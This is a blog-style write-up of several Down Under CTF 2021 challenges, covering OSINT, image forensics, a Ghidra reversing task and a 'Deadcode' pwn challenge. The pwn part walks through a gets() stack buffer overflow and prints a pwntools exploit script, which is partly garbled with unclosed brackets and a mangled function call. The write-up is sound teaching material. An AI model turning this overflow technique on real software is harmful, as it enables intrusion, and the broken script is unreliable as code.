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Down Under CTF 2021

Downunder CTF is one of the largest annual CTF shows and the biggest online CTF challenge from the Australian continent. Also the backing and sponsorships showed up in the infrastructure and the smoothness with which the online challenge was run.

As always I would be highlighting the solves for challenges that I attempted and/or solved. Also I would be highlighting the solves for couple of pwn challenges which I tried and solved after the competition was over.

From the rules and the welcome challenge it was clear that the flags were always of the format DUCTF{...}. However the introduction challenge was a bit different wherein we had to connect to a netcat server. After a long message exchange the server gives out the introduction flag as part of the message. The introduction flag is DUCTF{w3lc0m3_70_7h3_duc7f_7hund3rd0m3_h4ck3r}.

Also the discord flag was available from the #request-support channel which was DUCTF{if_you_are_having_challenge_issues_come_here_pls}.

Challenge list

  1. Who goes there ? 🌏
  2. Get over it 🌁
  3. Retro 🖼
  4. How to pronounce GIF 🎞
  5. No strings 🧵
  6. Deadcode ♟️

Who goes there ? 🌏


The first OSINT challenge and one of the easier challenges of Downunder CTF. The challenge instructions were very comprehensive and was indicative of domain registrar information which is available via various popular sites like

Challenge instructions:

Disclaimer: Please note that this storyline, including any previous or future additions are all fictional and created solely for this challenge as part of DownUnder CTF. These are real places however they have no association/affiliation to the event, you are not required to call any place or make contact with anyone, doing so may disqualify you from the event.

Welcome to the team, glad you chose to join us - hopefully you’ll like it here and want to stay.
Let me tell you about your first task:

We’ve observed an underground criminal RaaS operation calling back to this domain, can you find
the number of the individual who registered the domain?

Flag format is DUCTF{+61}

From the challenge instructions it is clear that the flag is the phone number of the individual who has registered the given domain

Looking up the domain in gives us the required information forming the flag DUCTF{+61420091337}.

Who is output

Get over it 🌁


This was the second OSINT challenge with the below challenge instructions. It was pretty clear it would test our dork and reverse search skills. Along with the below instructions we are provided an image file which can be downloaded from here.

Challenge instructions:

Bridget loves bridges, this one is her favourite.
What is the name of it and the length of its main span to the nearest metre?
Flag format; DUCTF{the_bridge_name-1337m}

The image was that of a bridge and our goal was to find out the name of the image and its deck length. I started off with a reverse image search on Google. I did not get any obvious results even after a lot of contextual search including terms like Australia, Down under etc..

Next I moved on to Yandex reverse image search. The search did given me a list of similar images and clicking on one of them gave me the below details.

Eleanor Schonell initial

Once the initial details was available and as this bridge seemed a likely candidate, I looked up more in Wikipedia for Eleanor Schonell.

A quick read in Wikipedia gives us the total length as 390 meters and the deck length as 185 meters. Quickly forming the flag as stated in the instructions, the final flag turned out to be DUCTF{eleanor_schonell-185m}.

Retro 🖼


The first challenge under the forensics category was obviously targeted towards beginners. The challenge was pretty easy requiring us to figure out the flag from an image which can be donwnloaded here.

Challenge instructions:

Our original logo was created in paint, I wonder what other secrets it hides?

For most of the image based challenges the first thing to do is to run either exiftool command or strings command identify if any meta data or strings of interest are present in the image. Exiftool can be run on any image/file and it parses the available meta information and presents the same in the command line.

Below is the output of both the commands. For brevity I have piped the result with grep -in 'ductf' as the string of interest in out case starts with DUCTF.

└─$ exiftool og.jpg | grep -in "ductf"
17:Artist                          : DUCTF{sicc_paint_skillz!}
18:XP Author                       : DUCTF{sicc_paint_skillz!}
54:Creator                         : DUCTF{sicc_paint_skillz!}
└─$ strings og.jpg | grep -in "ductf"                
260:			<dc:creator><rdf:Seq xmlns:rdf=""><rdf:li>DUCTF{sicc_paint_skillz!}</rdf:li></rdf:Seq>

From the output it is very clear that our flag is DUCTF{sicc_paint_skillz!}.

How to pronounce GIF 🎞


The second challenge under forensics, also concentrated around image steganography, we are presented with the below instructions and a GIF image which can be downloaded here.

Challenge instructions:

Our machine that makes QR Codes started playing up then it just said “PC LOAD LETTER” and died.
This is all we could recover…

Similar to the previous challenge here too we are only provided with the below image and we run exiftool over it.


The result of running exiftool can be seen below:

└─$ exiftool challenge.gif
ExifTool Version Number         : 12.16
File Name                       : challenge.gif
Directory                       : .
File Size                       : 104 KiB
File Modification Date/Time     : 2021:09:25 06:41:27+05:30
File Access Date/Time           : 2021:09:29 00:25:48+05:30
File Inode Change Date/Time     : 2021:09:25 06:42:36+05:30
File Permissions                : rw-r--r--
File Type                       : GIF
File Type Extension             : gif
MIME Type                       : image/gif
GIF Version                     : 89a
Image Width                     : 300
Image Height                    : 22
Has Color Map                   : Yes
Color Resolution Depth          : 8
Bits Per Pixel                  : 8
Background Color                : 0
Animation Iterations            : Infinite
Comment                         : Created with GIF maker
Frame Count                     : 120
Duration                        : 6.00 s
Image Size                      : 300x22
Megapixels                      : 0.007

Initially the output from this seemed immaterial to the challenge. It looked as if we needed to reconstruct a single image by assembling the individual GIF frames. I set out to doing it using GIMP tool. But I failed miserably.

Then I re-iterated from the starting and the result of exiftool pointed towards a trivia that this GIF was made using an online tool Now this website seemed only my last hope of re-assembling the frames to get back the image.

More specifically the Split > GIF to sprite option in this site available here did exactly what we wanted. I quickly uploaded the GIF and left the number of columns option to the default of 5. This gave me a smudged image of five QR codes which clearly pointed that there were more than five QR codes.

Smudged QR code images

Naturally I increased the number of columns to 10 next. This gave me ten clear QR codes as seen below.

Clear QR codes images

Now that we had the individual QR codes, the only thing left to do was to scan them. Most of them were decoy QR codes. However specifically QR code 6 and QR code 8 gave me strings which look like Base64 encoded as seen below.

QR code 6 - RFVDVEZ7YU1 - 
QR code 8 - fMV9oYVhYMHJfbjB3P30=

Concatenating both the strings and Base64 decoding gives us the final flag DUCTF{aM_1_haXX0r_n0w?}.

No strings 🧵


The first challenge in the Reversing category, this was supposed to be pretty easy. Also the challenge name and the challenge instructions below point a lot towards applying the strings command to the given binary which can be downloaded from here.

Challenge instructions:

This binary contains a free flag. No strings attached, seriously!

As everything pointed towards strings command I tried it out first and did not get any actionable string from it.

Next as done for any reversing challenge, I loaded the binary into Ghidra. On examining the disassembled view the flag was available as continuous characters in a data frame, as seen below. To be more specific, the flag was available from the starting address 0x00102008 with every second byte from there containing one character of the flag.

Flag in data section

The final flag obtained by reading off all the characters from the data section was DUCTF{stringent_strings_string}.

Deadcode ♟️


The first PWN challenge in this edition and supposed to be one of the easiest in this category. However as I had no idea on how to solve Pwn challenges I could not attempt it during the CTF. However, I came across a very good article of one of the Pwn challenges of CSAW21 which can be viewed here.

It was really informative and covered the essence of Pwning in a crisp manner giving me a starting point. To check if I really understood the concepts I went ahead and tried to solve this challenge from the DownUnder CTF under PWN category.

The first step was to enhance our gdb tool by installing the gdb-pwndbg plugin as explained here.

In the challenge we are presented with the below instructions and a binary file which can be downloaded here.

Challenge instructions:

I’m developing this new application in C, I’ve setup some code for the new features but it’s not (a)live yet. nc 31916

From the instructions it was clear that we have to achieve a shell in our local system to understand and formulate the required payload post which the same exploit had to be applied on the remote server in order to gain a remote shell and exfiltrate the flag.

For any Pwn challenge the order of operations is generally the below:

  1. Use checksec command to view the security enforcements applied on the binary.
  2. Use strings command on the binary file to see if there are any strings of interest.
  3. Use ltrace command to run the code and see if there is any thing obvious.
  4. Load the binary in Ghidra to view the code.
  5. Use gdb in order to narrow down to the payload and the offset required.

We start with checking the security controls on the binary. As seen below the binary is as unsafe as possible with almost no security constraints.

└─$ checksec --file ./deadcode    
[*] '/home/cryptonic/CTFs/downunder/deadcode/deadcode'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

Apart from NX => Non Executable there is no other security constraints applied. As there is no canary it is easy for us to perform a buffer overflow in case the same is needed.

Next we run strings and ltrace commands to see if there are any obvious things that lead us to the flag but we do not get any actionable detail.

Proceeding further I loaded up the binary into Ghidra. A snapshot of the reconstructed C cdod can be viewed below.

C code deadcode

The below facts are clear from the code:

  1. We have two local variables local_28 which is a char array and local_10 which is a long value.
  2. The variable local_28 and local_10 are defined immediately after each other.
  3. The user input is obtained using gets function and stored in local_28.
  4. If the value of local_10 variable matched the hex value of 0xdeadc0de then we are presented a shell.

As there is no user input associated with the variable local_10 variable it is clear that we need to modify its value by performing a buffer overflow attack.

To give an introduction, buffer overflow attack exploits the know rule of a disassembler assigning local variables of a function addresses that are one after another. As ASLR is disabled (as seen from output of checksec command) we can be sure that the offsets and addresses we see here are exactly the same where the code will be loaded in the remote server too. Atleast the relative addresses will necessarily remain the same.

So our next step is to narrow down the required payload. For this specific challenge, it can be done really easily as the variables are stored one after another in the stack. We can clearly see that after 24 bytes of genuine string payload, we need to follow it with 4 bytes of value equal to 0xdeadc0de. Although the above does give us a shell, I would present a more generic way inspired from the video I highlighted at the start.

We load up the binary in gdb (remember we already have gdb-pwndbg installed) and set breakpoints in the specific address where the comparison happens. Next we use the pwndbg cyclic command to generate a cyclic payload which makes it easy for us to look up any four continuous bytes of data to know its offset.

Now we run the code, supply the generated payload and we will land up at a segmentation fault error. At this point the current stack and heap and other register details are printed in gdb. On closely analyzing the address which holds the variable local_10 at this state we can find out the value stored in it. The starting four bytes can be copied and used in the cyclick -l command to look up the offset which points to 24 again.

A run of the above mentioned method to find the offset can be seen below.

GDB PwnDBG find offset

To make it more clear, we set the breakpoint at 0x4011dd which is the address of the comparison instruction. Also from Ghidra we can see that local_10 variable is at [RBP - 0x08] where RBP is the base pointer. In our current execution this value is 0x7fffffffddf8 which means we need to look up the offset of the first four bytes of value in the address 0x7fffffffddb0 - 0x08 = 0x7fffffffdda8. The part of our cyclic payload that is present in this address starts with gaaa and finding the offset of these four bytes within our cyclic payload gives 24 , which is the offset at which the value starts overflowing into the variable local_10.

Next we create our exploit file using the pwn tools library as shown in this template. We start with the template and modify, the binary path, offset and the actual value to be overflown to the variable. Our final exploit file is given below.

Click here to view the exploit file
from pwn import *

# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)

# Find offset to EIP/RIP for buffer overflows
def find_ip(payload):
    # Launch process and send payload
    p = process(exe)
    p.sendlineafter('>', payload)
    # Wait for the process to crash
    # Print out the address of EIP/RIP at the time of crashing
    # ip_offset = cyclic_find(p.corefile.pc)  # x86
    ip_offset = cyclic_find(, 4))  # x64
    info('located EIP/RIP offset at {a}'.format(a=ip_offset))
    return ip_offset

# Specify GDB script here (breakpoints etc)
gdbscript = '''

# Binary filename
exe = './deadcode'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Change logging level to help with debugging (warning/info/debug)
context.log_level = 'info'

# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================

# Pass in pattern_size, get back EIP/RIP offset
offset = 24 # find_ip(cyclic(500))

# Start program
io = start()

# Build the payload
payload = flat([
    offset * "A",
    3735929054 # or can be used as 0xdeadc0de

# Save the payload to file
write('payload', payload)

# Send the payload
io.sendlineafter('my app?', payload)
#io.recvuntil('Thank you!\n')

# Got Shell?

# Or, Get our flag!
# flag = io.recv()
# success(flag)

Running this on the local machine from the directory where the binary exists we see that we can get an interactive shell. Below is the run on the remote server.

Execution in remote

The final flag after pwning is obtained as DUCTF{y0u_br0ught_m3_b4ck_t0_l1f3_mn423kcv}.

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Page last modified: 29 Sep, 2021 at 02:48 AM .